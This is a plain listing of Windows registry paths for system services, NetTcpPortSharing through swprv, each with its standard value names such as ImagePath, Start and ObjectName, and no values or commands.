HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Group
